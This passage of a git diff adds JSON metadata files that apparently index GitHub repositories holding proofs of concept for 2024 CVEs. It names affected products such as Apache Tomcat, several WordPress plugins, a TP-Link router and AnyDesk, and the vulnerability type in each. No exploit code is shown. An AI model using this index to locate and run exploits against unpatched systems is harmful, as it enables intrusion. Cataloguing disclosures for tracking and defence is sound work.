50732289, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50732289?v=4", + "html_url": "https:\/\/github.com\/nanwinata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanwinata\/CVE-2024-52301", + "description": "Arbitrary Argument Injection Scanner CVE-2024-52301", + "fork": false, + "created_at": "2024-11-30T04:25:06Z", + "updated_at": "2024-11-30T04:38:03Z", + "pushed_at": "2024-11-30T04:38:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52302.json b/2024/CVE-2024-52302.json new file mode 100644 index 0000000000..7e694f320e --- /dev/null +++ b/2024/CVE-2024-52302.json @@ -0,0 +1,33 @@ +[ + { + "id": 888564124, + "name": "CVE-2024-52302", + "full_name": "d3sca\/CVE-2024-52302", + "owner": { + "login": "d3sca", + "id": 86044770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86044770?v=4", + "html_url": "https:\/\/github.com\/d3sca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3sca\/CVE-2024-52302", + "description": "common-user-management is a robust Spring Boot application featuring user management services designed to control user access dynamically. There is a critical security vulnerability in the application endpoint \/api\/v1\/customer\/profile-picture. This endpoint allows file uploads without proper validation or restrictions leads to (RCE)", + "fork": false, + "created_at": "2024-11-14T16:04:00Z", + "updated_at": "2024-11-19T06:02:59Z", + "pushed_at": "2024-11-19T06:02:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52316.json b/2024/CVE-2024-52316.json new file mode 100644 index 0000000000..598be2931f --- /dev/null +++ b/2024/CVE-2024-52316.json @@ -0,0 +1,33 @@ +[ + { + "id": 891432537, + "name": "CVE-2024-52316", + "full_name": "TAM-K592\/CVE-2024-52316", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-52316", + "description": "CVE-2024-52316 - Apache Tomcat Authentication Bypass Vulnerability", + "fork": false, + "created_at": "2024-11-20T10:22:50Z", + "updated_at": "2024-12-28T05:47:37Z", + "pushed_at": "2024-11-20T10:40:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52317.json b/2024/CVE-2024-52317.json new file mode 100644 index 0000000000..dbcf8bb40d --- /dev/null +++ b/2024/CVE-2024-52317.json @@ -0,0 +1,33 @@ +[ + { + "id": 891891768, + "name": "CVE-2024-52317", + "full_name": "TAM-K592\/CVE-2024-52317", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-52317", + "description": "CVE-2024-52317 - Apache Tomcat HTTP\/2 Data Leakage Vulnerability", + "fork": false, + "created_at": "2024-11-21T06:20:42Z", + "updated_at": "2024-12-28T05:47:34Z", + "pushed_at": "2024-11-21T06:33:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52318.json b/2024/CVE-2024-52318.json new file mode 100644 index 0000000000..01f4efe599 --- /dev/null +++ b/2024/CVE-2024-52318.json @@ -0,0 +1,33 @@ +[ + { + "id": 891898238, + "name": "CVE-2024-52318", + "full_name": "TAM-K592\/CVE-2024-52318", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-52318", + "description": "CVE-2024-52318 - Apache Tomcat XSS Vulnerability in Generated JSPs", + "fork": false, + "created_at": "2024-11-21T06:38:48Z", + "updated_at": "2024-12-28T05:47:34Z", + "pushed_at": "2024-11-21T06:44:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52335.json b/2024/CVE-2024-52335.json new file mode 100644 index 0000000000..1b21b666d2 --- /dev/null +++ b/2024/CVE-2024-52335.json @@ -0,0 +1,33 @@ +[ + { + "id": 899692806, + "name": "CVE-2024-52335", + "full_name": "cloudefence\/CVE-2024-52335", + "owner": { + "login": "cloudefence", + "id": 189002472, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/189002472?v=4", + "html_url": "https:\/\/github.com\/cloudefence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cloudefence\/CVE-2024-52335", + "description": "CVE-2024-52335: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)", + "fork": false, + "created_at": "2024-12-06T20:02:00Z", + "updated_at": "2024-12-06T20:28:41Z", + "pushed_at": "2024-12-06T20:25:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52380.json b/2024/CVE-2024-52380.json new file mode 100644 index 0000000000..a8e1376d1a --- /dev/null +++ b/2024/CVE-2024-52380.json @@ -0,0 +1,64 @@ +[ + { + "id": 893988150, + "name": "CVE-2024-52380", + "full_name": "RandomRobbieBF\/CVE-2024-52380", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52380", + "description": "Picsmize <= 1.0.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-25T14:56:38Z", + "updated_at": "2024-11-25T14:57:59Z", + "pushed_at": "2024-11-25T14:57:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896307615, + "name": "CVE-2024-52380", + "full_name": "0xshoriful\/CVE-2024-52380", + "owner": { + "login": "0xshoriful", + "id": 167082207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167082207?v=4", + "html_url": "https:\/\/github.com\/0xshoriful", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xshoriful\/CVE-2024-52380", + "description": null, + "fork": false, + "created_at": "2024-11-30T02:43:11Z", + "updated_at": "2024-11-30T02:43:33Z", + "pushed_at": "2024-11-30T02:43:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52382.json b/2024/CVE-2024-52382.json new file mode 100644 index 0000000000..6934fbd626 --- /dev/null +++ b/2024/CVE-2024-52382.json @@ -0,0 +1,33 @@ +[ + { + "id": 892169698, + "name": "CVE-2024-52382", + "full_name": "RandomRobbieBF\/CVE-2024-52382", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52382", + "description": "Matix Popup Builder <= 1.0.0 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2024-11-21T16:19:12Z", + "updated_at": "2024-11-21T16:20:27Z", + "pushed_at": "2024-11-21T16:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52429.json b/2024/CVE-2024-52429.json new file mode 100644 index 0000000000..7d79dc6bd6 --- /dev/null +++ b/2024/CVE-2024-52429.json @@ -0,0 +1,33 @@ +[ + { + "id": 892550666, + "name": "CVE-2024-52429", + "full_name": "RandomRobbieBF\/CVE-2024-52429", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52429", + "description": "WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin\/Theme Installation", + "fork": false, + "created_at": "2024-11-22T10:26:55Z", + "updated_at": "2024-11-27T09:45:27Z", + "pushed_at": "2024-11-22T10:28:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52430.json b/2024/CVE-2024-52430.json new file mode 100644 index 0000000000..1505567a41 --- /dev/null +++ b/2024/CVE-2024-52430.json @@ -0,0 +1,33 @@ +[ + { + "id": 893955029, + "name": "CVE-2024-52430", + "full_name": "RandomRobbieBF\/CVE-2024-52430", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52430", + "description": "Lis Video Gallery <= 0.2.1 - Unauthenticated PHP Object Injection", + "fork": false, + "created_at": "2024-11-25T13:55:39Z", + "updated_at": "2024-11-25T13:56:56Z", + "pushed_at": "2024-11-25T13:56:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52433.json b/2024/CVE-2024-52433.json new file mode 100644 index 0000000000..f250d44cd4 --- /dev/null +++ b/2024/CVE-2024-52433.json @@ -0,0 +1,33 @@ +[ + { + "id": 892512845, + "name": "CVE-2024-52433", + "full_name": "RandomRobbieBF\/CVE-2024-52433", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-52433", + "description": "My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection", + "fork": false, + "created_at": "2024-11-22T08:56:58Z", + "updated_at": "2024-11-22T08:58:31Z", + "pushed_at": "2024-11-22T08:58:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5246.json b/2024/CVE-2024-5246.json new file mode 100644 index 0000000000..b2cef62c5b --- /dev/null +++ b/2024/CVE-2024-5246.json @@ -0,0 +1,33 @@ +[ + { + "id": 837382117, + "name": "CVE-2024-5246", + "full_name": "Abdurahmon3236\/CVE-2024-5246", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-5246", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:56:39Z", + "updated_at": "2024-08-02T20:57:05Z", + "pushed_at": "2024-08-02T20:57:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52475.json b/2024/CVE-2024-52475.json new file mode 100644 index 0000000000..2b1f93bd29 --- /dev/null +++ b/2024/CVE-2024-52475.json @@ -0,0 +1,33 @@ +[ + { + "id": 892766339, + "name": "CVE-2024-52475", + "full_name": "ubaii\/CVE-2024-52475", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-52475", + "description": "Broken Authentication in Wordpress plugin (Wawp Plugin < 3.0.18)", + "fork": false, + "created_at": "2024-11-22T18:29:54Z", + "updated_at": "2024-11-22T18:30:35Z", + "pushed_at": "2024-11-22T18:30:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52711.json b/2024/CVE-2024-52711.json new file mode 100644 index 0000000000..0833137e2e --- /dev/null +++ b/2024/CVE-2024-52711.json @@ -0,0 +1,33 @@ +[ + { + "id": 891000517, + "name": "cyberspace-CVE-2024-52711", + "full_name": "14mb1v45h\/cyberspace-CVE-2024-52711", + "owner": { + "login": "14mb1v45h", + "id": 166547152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166547152?v=4", + "html_url": "https:\/\/github.com\/14mb1v45h", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/14mb1v45h\/cyberspace-CVE-2024-52711", + "description": "POC-Proof-of-exploit CVE-2024-52711", + "fork": false, + "created_at": "2024-11-19T14:55:16Z", + "updated_at": "2024-11-19T15:00:18Z", + "pushed_at": "2024-11-19T14:59:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5274.json b/2024/CVE-2024-5274.json new file mode 100644 index 0000000000..d9f71ed094 --- /dev/null +++ b/2024/CVE-2024-5274.json @@ -0,0 +1,64 @@ +[ + { + "id": 826587360, + "name": "CVE-2024-5274-Detection", + "full_name": "Alchemist3dot14\/CVE-2024-5274-Detection", + "owner": { + "login": "Alchemist3dot14", + "id": 63059909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059909?v=4", + "html_url": "https:\/\/github.com\/Alchemist3dot14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alchemist3dot14\/CVE-2024-5274-Detection", + "description": "Guardian Code: A Script to Uncover CVE-2024-5274 Vulnerabilities", + "fork": false, + "created_at": "2024-07-10T02:15:56Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-07-10T08:56:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849326818, + "name": "CVE-2024-5274", + "full_name": "mistymntncop\/CVE-2024-5274", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2024-5274", + "description": null, + "fork": false, + "created_at": "2024-08-29T11:58:25Z", + "updated_at": "2024-12-30T14:07:15Z", + "pushed_at": "2024-08-30T01:15:43Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 78, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52800.json b/2024/CVE-2024-52800.json new file mode 100644 index 0000000000..c5dca1df66 --- /dev/null +++ b/2024/CVE-2024-52800.json @@ -0,0 +1,33 @@ +[ + { + "id": 896365830, + "name": "GHSA-4cx5-89vm-833x-POC", + "full_name": "JAckLosingHeart\/GHSA-4cx5-89vm-833x-POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/GHSA-4cx5-89vm-833x-POC", + "description": "GHSA-4cx5-89vm-833x\/CVE-2024-52800", + "fork": false, + "created_at": "2024-11-30T06:55:07Z", + "updated_at": "2024-11-30T06:56:08Z", + "pushed_at": "2024-11-30T06:56:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52940.json b/2024/CVE-2024-52940.json new file mode 100644 index 0000000000..29513c6e0d --- /dev/null +++ b/2024/CVE-2024-52940.json @@ -0,0 +1,76 @@ +[ + { + "id": 879314420, + "name": "abdal-anydesk-remote-ip-detector", + "full_name": "ebrasha\/abdal-anydesk-remote-ip-detector", + "owner": { + "login": "ebrasha", + "id": 9009001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9009001?v=4", + "html_url": "https:\/\/github.com\/ebrasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ebrasha\/abdal-anydesk-remote-ip-detector", + "description": "CVE-2024-52940 - A zero-day vulnerability in AnyDesk's \"Allow Direct Connections\" feature, discovered and registered by Ebrahim Shafiei (EbraSha), exposing public and private IP addresses. For details, visit the NVD, Tenable, or MITRE pages.", + "fork": false, + "created_at": "2024-10-27T15:29:56Z", + "updated_at": "2025-01-06T15:22:09Z", + "pushed_at": "2024-11-18T15:09:32Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": true, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abdal", + "abdal-security-group", + "anydesk", + "anydesk-ip-leak-vulnerability", + "cve-2024-52940", + "ebrahim-shafiei", + "ebrasha", + "ip-leak", + "vulnerability", + "zero-day", + "zero-day-vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897139433, + "name": "AnySniff", + "full_name": "MKultra6969\/AnySniff", + "owner": { + "login": "MKultra6969", + "id": 40924797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40924797?v=4", + "html_url": "https:\/\/github.com\/MKultra6969", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MKultra6969\/AnySniff", + "description": "AnySniff is a tool for monitoring TCP connections of processes like AnyDesk on Windows. It uses the CVE-2024-52940 vulnerability to track open connections and log IPs, ports, and other details.", + "fork": false, + "created_at": "2024-12-02T05:15:11Z", + "updated_at": "2024-12-03T13:34:47Z", + "pushed_at": "2024-12-03T13:31:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5324.json b/2024/CVE-2024-5324.json new file mode 100644 index 0000000000..c17d7cd9cd --- /dev/null +++ b/2024/CVE-2024-5324.json @@ -0,0 +1,37 @@ +[ + { + "id": 811264259, + "name": "CVE-2024-5324", + "full_name": "RandomRobbieBF\/CVE-2024-5324", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-5324", + "description": "Login\/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - Missing Authorization to Arbitrary Options Update", + "fork": false, + "created_at": "2024-06-06T09:01:46Z", + "updated_at": "2024-10-18T17:57:44Z", + "pushed_at": "2024-06-06T09:05:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-5324", + "easy-login-woocommerce", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53255.json b/2024/CVE-2024-53255.json new file mode 100644 index 0000000000..2a10256dbf --- /dev/null +++ b/2024/CVE-2024-53255.json @@ -0,0 +1,33 @@ +[ + { + "id": 894399924, + "name": "CVE-2024-53255", + "full_name": "0x4M3R\/CVE-2024-53255", + "owner": { + "login": "0x4M3R", + "id": 163415000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163415000?v=4", + "html_url": "https:\/\/github.com\/0x4M3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4M3R\/CVE-2024-53255", + "description": "boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)", + "fork": false, + "created_at": "2024-11-26T09:41:54Z", + "updated_at": "2024-11-26T09:45:42Z", + "pushed_at": "2024-11-26T09:45:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53259.json b/2024/CVE-2024-53259.json new file mode 100644 index 0000000000..5590e1da57 --- /dev/null +++ b/2024/CVE-2024-53259.json @@ -0,0 +1,33 @@ +[ + { + "id": 898373341, + "name": "cve-2024-53259", + "full_name": "kota-yata\/cve-2024-53259", + "owner": { + "login": "kota-yata", + "id": 51294895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51294895?v=4", + "html_url": "https:\/\/github.com\/kota-yata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kota-yata\/cve-2024-53259", + "description": null, + "fork": false, + "created_at": "2024-12-04T09:27:22Z", + "updated_at": "2024-12-04T09:27:53Z", + "pushed_at": "2024-12-04T09:28:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5326.json b/2024/CVE-2024-5326.json new file mode 100644 index 0000000000..7e8cec0173 --- /dev/null +++ b/2024/CVE-2024-5326.json @@ -0,0 +1,64 @@ +[ + { + "id": 808885711, + "name": "CVE-2024-5326-Poc", + "full_name": "truonghuuphuc\/CVE-2024-5326-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-5326-Poc", + "description": "CVE-2024-5326 Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX <= 4.1.2 - Missing Authorization to Arbitrary Options Update", + "fork": false, + "created_at": "2024-06-01T04:23:54Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-01T04:39:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815016982, + "name": "CVE-2024-5326-Poc", + "full_name": "cve-2024\/CVE-2024-5326-Poc", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-5326-Poc", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:12:29Z", + "updated_at": "2024-06-14T07:15:23Z", + "pushed_at": "2024-06-14T07:15:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53345.json b/2024/CVE-2024-53345.json new file mode 100644 index 0000000000..564b4eec28 --- /dev/null +++ b/2024/CVE-2024-53345.json @@ -0,0 +1,33 @@ +[ + { + "id": 907287454, + "name": "CVE-2024-53345", + "full_name": "ShadowByte1\/CVE-2024-53345", + "owner": { + "login": "ShadowByte1", + "id": 155693555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155693555?v=4", + "html_url": "https:\/\/github.com\/ShadowByte1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowByte1\/CVE-2024-53345", + "description": "Critical 0 Day in Car Rental Management System Versions 1.0 - 1.3", + "fork": false, + "created_at": "2024-12-23T08:48:51Z", + "updated_at": "2024-12-23T09:10:54Z", + "pushed_at": "2024-12-23T09:10:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53375.json b/2024/CVE-2024-53375.json new file mode 100644 index 0000000000..ff1947bbe1 --- /dev/null +++ b/2024/CVE-2024-53375.json @@ -0,0 +1,33 @@ +[ + { + "id": 867639922, + "name": "CVE-2024-53375", + "full_name": "ThottySploity\/CVE-2024-53375", + "owner": { + "login": "ThottySploity", + "id": 119318084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119318084?v=4", + "html_url": "https:\/\/github.com\/ThottySploity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThottySploity\/CVE-2024-53375", + "description": "TP-Link Archer AXE75 Authenticated Command Injection", + "fork": false, + "created_at": "2024-10-04T12:49:19Z", + "updated_at": "2024-12-22T22:56:07Z", + "pushed_at": "2024-12-19T09:34:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53376.json b/2024/CVE-2024-53376.json new file mode 100644 index 0000000000..12deee5f12 --- /dev/null +++ b/2024/CVE-2024-53376.json @@ -0,0 +1,33 @@ +[ + { + "id": 903925414, + "name": "CVE-2024-53376", + "full_name": "ThottySploity\/CVE-2024-53376", + "owner": { + "login": "ThottySploity", + "id": 119318084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119318084?v=4", + "html_url": "https:\/\/github.com\/ThottySploity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThottySploity\/CVE-2024-53376", + "description": 